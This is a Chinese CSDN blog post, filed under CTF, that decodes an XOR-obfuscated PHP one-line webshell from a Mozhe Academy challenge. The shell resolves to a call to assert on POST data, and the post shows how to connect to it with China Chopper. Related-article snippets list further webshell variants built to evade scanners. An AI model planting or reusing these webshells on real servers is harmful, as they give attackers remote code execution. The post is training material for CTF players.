变种一句话木马

最新推荐文章于 2023-02-15 13:21:28 发布
最新推荐文章于 2023-02-15 13:21:28 发布
阅读量916 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44060093/article/details/105239439
版权

墨者学院有一道例题
在这里插入图片描述
在这里插入图片描述
我们打开网站发现了一串php代码

<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>

看着很乱里面用了好多异或运算,但我们只需要打印出变量的值然后拼接在最后一句代码中即可

${$__}[!$_](${$___}[$_]); 

<?php @$_++;
$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
//${$__}[!$_](${$___}[$_]); 
echo $_;
echo " ";
echo $__;
echo " ";
echo $___;
?>

打印结果如下
1 _GET _POST
及可知

$_=1
$__=_GET
$___=_POST

则整理最后一句得到一句话代码

${_GET}[0](${_POST}[1]);

构造ip/?assert=0
用菜刀连接
密码是1

${$__}[!$_](${$___}[$_]);

主要是根据这一句来说的。
PHP会求得位于{}之间的表达式的值,并将这个值作为一个变量名。
前边通过对特殊字符的异或操作,最终得到_GET和_POST
这两个数组属于特殊数组,他们是像服务器传递数据用的
所以一般网站会对这两个数组进行设置,不让人为修改。
使用这个就绕开了网站对这两个数组进行的设置。然后修改数组。
提交参数0=assert,代码就变成了 <?php assert($_POST[1]); ?>

K—C
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C语言变种水仙花数.zip
10-26
C语言变种水仙花数
康拓1数据延期发卡教程 康拓变种工具
06-13
康拓1数据延期发卡教程 康拓变种工具
Mirai变种Masuta源码
03-11
“Masuta”是2018年1月份被研究人员发现的一款新型Mirai恶意软件变体,其开发人员Mirai Okiru还曾创建过肆虐全球的Satori僵尸网络。不过,Masuta的代码更加彰显了“专业开发”的属性,无论是其附加功能,还是程序员处理代码痕迹的方式都是前几个版本的变种所不具备的。Masuta的发展不仅展现了漏洞利用家族的演变,还展现了个人程序员的演变。
C变种水仙花数.zip
最新发布
10-13
C变种水仙花数
【PHP-CTF】无字母无数字webshell
尚未佩妥剑 转眼便江湖
10-31 7939
PHP无字母数字构造Webshell 题目 index.php: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
变形的一句话木马
时光凉春衫薄的博客
10-14 1548
变形的一句话木马 下图是一个解析的东西:这是个一句话木马的变形通过异或运算来规避所有的敏感函数。。。 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?&gt...
一句话木马的各种变形
司徒荆的博客
07-13 2521
一句话木马的各种变形
php变种一句话,PHP一句话木马研究
weixin_30010599的博客
03-09 413
最近在研究PHP一句话后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法。现总结如下:方案一:回调函数回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数参数传递到其它代码的,某一块可执行代码的引用。已被D盾查杀的函数:array_filter()array_walk()array_walk_recursive()array_map()...
php一句话木马变形技巧
热门推荐
bylfsj的博客
09-24 4万+
一、什么是一句话木马一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 二、我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ...
一句话木马各种变形
qq_37872337的博客
06-13 1750
0x00:简介         一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马一直在跟杀软斗智斗勇,出现一种,杀软秒更新规则。木马再变形,再被杀。。。 0x01:叙事 一、常见的一句话 ...
一个神秘的一句话后门代码详解
weixin_33950035的博客
08-04 278
神秘的一句话后门代码内容:<?php @$_++;$__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");${$__}[!$_](${$__}[$_]); ?>代码作用:以上代码即是PHP的一句话后门,当POST数据为0=assert&1=phpinf...
PHP代码分析 CTF
weixin_30333885的博客
04-15 361
1.练练墨者学院的靶机。关于php 打开如下图。 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?> 2.先执行一下。 前三行为传参...
【2022-04-27】AST Babel JJEncode反混淆学习
迷心兔的博客
04-27 440
测试混淆代码 $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+""
一句话木马的变形
qq_45751902的博客
10-25 1153
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。使用方法:先用浏览器访问,生成新的文件"hello.php",再连接"hello.php"。这里是base64解密函数,"YXNzZXJ0"是assert的base64加密。第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。,按照PHP的格式,表达式在两个“/”之间。把用户传递的数据生成一个函数fun(),然后再执行fun()。利用函数生成文件,第一个参数是文件名,第二个参数是文件的内容。
一句话木马变形(编码)
buffedon的博客
12-20 795
一句话木马变形(编码) 注意:如果全文只是加密的密文的话,那么就相当于是一个字符串,在解析的时候不符合语义,依然不会检测出来 base64 编码 php <?php $c = base64_decode('YXNzZXJ0'); $c($_POST['pwd']); ?> java语言 <%@ Page Language="Jscript" Debug=true%> <% var a=Request.Form("mr6"); var res=System.Text.Encod
一句话木马该怎么实现?现在就带你了解
dzqxwzoe的博客
02-15 809
一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。基于JS引擎的Java一句话体积更小,变化种类更多,使用起来更灵活。
php变异一句话
黑面小窝
10-23 2062
第一种:1.php   在菜刀里写http://www.xxx.com /1.php?2=assert密码是1   第二种2.php   $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> 在菜刀里写 http://www.xxx.com/2.php?_=asser
函数重载
foreverqq24的博客
11-18 234
函数重载 在C++中,同一个函数名称可多次定义,即函数重载。函数重载主要作用是提高代码复用性。 1、函数重载满足条件 同一作用域下 函数名称相同 函数参数类型不同 或者个数不同或者顺序不同 注意:返回值不能作为函数重载的条件 2、示例 #include <iostream> #include <string> using namespace std; void func() { cout << "func 的调用" << endl; } void
【Web】变种一句话木马--中国菜刀连接
HAPPY
07-29 8586
         【Web】变种一句话木马--中国菜刀连接 遇到这种文件: &lt;?php error_reporting(0); $_GET['POST']($_POST['GET']); ?&gt; 就是变种一句话木马   在php网址后面加上 ?POST=assert 编辑栏密码为GET 连接即可 或者 &lt;?php $POST['POST']='assert...
transformer变种
07-22
4. XLNet:XLNet模型是一种自回归和自编码模型的结合,通过改变输入序列的排列顺序来预测每个位置上的词,从而解决了BERT等模型中的自回归偏置问题。 5. RoBERTa(A Robustly Optimized BERT Pretraining Approach...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值